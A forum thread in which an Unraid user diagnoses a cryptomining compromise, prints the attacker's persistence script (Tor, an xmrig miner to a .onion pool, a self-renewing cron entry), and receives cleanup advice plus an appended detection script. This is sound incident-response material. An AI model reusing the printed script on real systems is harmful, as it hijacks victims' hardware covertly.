vcadieux Posted July 13, 2023 (edited)

Hello,

I noticed my Unraid server had 100% CPU on each core, so I started digging into where the issue was, and I found using htop that multiple xmrig processes are running; those seem to be related to crypto mining.

I immediately disabled all port forwarding on my router, as it was probably from there that someone hijacked my server, and I also shut down the Docker engine, but the processes are still there. The only VM I have is also off.

I've checked the go file and nothing is wrong there, so I am a bit lost. It's very hard to access the Unraid WEBUI as it is so CPU overloaded that it barely responds.

I've attached the diagnostic file to this post if anyone can help me fix this once and for all.

In the diagnostic file I found this line in /system/ps.txt:

    root 2918 0.0 0.0 16856 4180 ? Ssl 18:15 0:00 xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u H19-i5-11600K -p x --cpu-max-threads-hint=75 -x socks5://127.0.0.1:25372 -B

How do I remove this?

Attachment: unraidserver-diagnostics-20230712-2116.zip

vcadieux Posted July 13, 2023 (edited)

So after looking carefully inside my USB drive, here is what I found:

In the file /config/wireguard/go:

    mid=H19-i5-11600K
    if pgrep -f "c3pool" > /dev/null
    then
        kill -9 $(pgrep -f "c3pool")
        sleep 5
    fi
    if ! pgrep -x "tor" > /dev/null
    then
        installpkg /boot/extra/snowflake.txz
        tor
    fi
    if ! pgrep -x "xmrig" > /dev/null
    then
        installpkg /boot/extra/rig-6.1.19.2-linux-static-x64.txz
        xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u $mid -p x --cpu-max-threads-hint=75 -x socks5://127.0.0.1:25372 -B
    fi
    if ! crontab -l | grep -q wireguard > /dev/null
    then
        crontab -l | { cat; echo "*/10 * * * * /bin/bash /boot/config/wireguard/go"; } | crontab -
    fi

In the file /config/go:

    #!/bin/bash
    # Start the Management Utility
    tor
    /usr/local/sbin/emhttp &
    /bin/bash /boot/config/wireguard/go

So I removed the tor line and this one:

    /bin/bash /boot/config/wireguard/go

and rebooted. I also removed everything inside /config/wireguard/go.

The process doesn't seem to come back, but still, there is a package called rig-6.1.19.2-linux-static-x64.txz being installed every time during the boot process (before the Unraid login prompt); see attached picture.

Searching for this package name (rig-6.1.19.2-linux-static-x64.txz) using Notepad++ in all the files on the USB key doesn't give me any results...

Any help would be appreciated!

JorgeB Posted July 13, 2023

If there are any files inside /boot/extra, remove them.
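
One way to check a flash drive for the persistence points identified in this thread (extra lines in the go file, a script under config/, packages staged in extra/, and the cron entry). This is an added example, not part of the original posts: the function names, the search strings and the premise that an unmodified go file only starts emhttp are assumptions, and the sample tree is constructed.

```shell
#!/bin/bash
# Audit an Unraid flash drive for the persistence points seen in this thread.
# On a server: audit_flash /boot; crontab -l | audit_cron

# Lines in a go script that are not blank, comments, or the emhttp start line.
# Assumption: an unmodified /boot/config/go only starts emhttp.
audit_go() {
    [ -f "$1" ] || return 0
    grep -nvE '^[[:space:]]*(#.*)?$|^/usr/local/sbin/emhttp' "$1" | sed 's/^/GO-LINE /'
    return 0
}

# Files under config/ containing strings from the script posted above.
audit_config() {
    [ -d "$1/config" ] || return 0
    grep -rlE 'xmrig|\.onion|socks5://|\| *crontab -' "$1/config" | sed 's/^/SUSPECT-FILE /'
    return 0
}

# Packages staged in extra/, where the posted script kept its payloads.
audit_extra() {
    [ -d "$1/extra" ] || return 0
    find "$1/extra" -type f | sort | sed 's/^/EXTRA-PKG /'
}

# Cron entries (read from stdin) that run anything from the flash drive.
audit_cron() { grep -E '/boot/' | grep -v '^#' | sed 's/^/CRON /'; return 0; }

audit_flash() { audit_go "$1/config/go"; audit_config "$1"; audit_extra "$1"; }

# Constructed sample tree modelled on the files quoted in the thread.
sample=$(mktemp -d)
mkdir -p "$sample/config/wireguard" "$sample/extra"
printf '%s\n' '#!/bin/bash' '# Start the Management Utility' 'tor' \
    '/usr/local/sbin/emhttp &' '/bin/bash /boot/config/wireguard/go' > "$sample/config/go"
printf '%s\n' 'xmrig -o EXAMPLE.onion:3333 -x socks5://127.0.0.1:25372 -B' \
    > "$sample/config/wireguard/go"
: > "$sample/extra/snowflake.txz"
: > "$sample/extra/rig-6.1.19.2-linux-static-x64.txz"
REPORT=$(audit_flash "$sample"
         echo '*/10 * * * * /bin/bash /boot/config/wireguard/go' | audit_cron)
printf '%s\n' "$REPORT"
rm -rf "$sample"
```

Every line it prints is something to review by hand; legitimate customisations of the go file or packages you placed in extra/ yourself will also be listed.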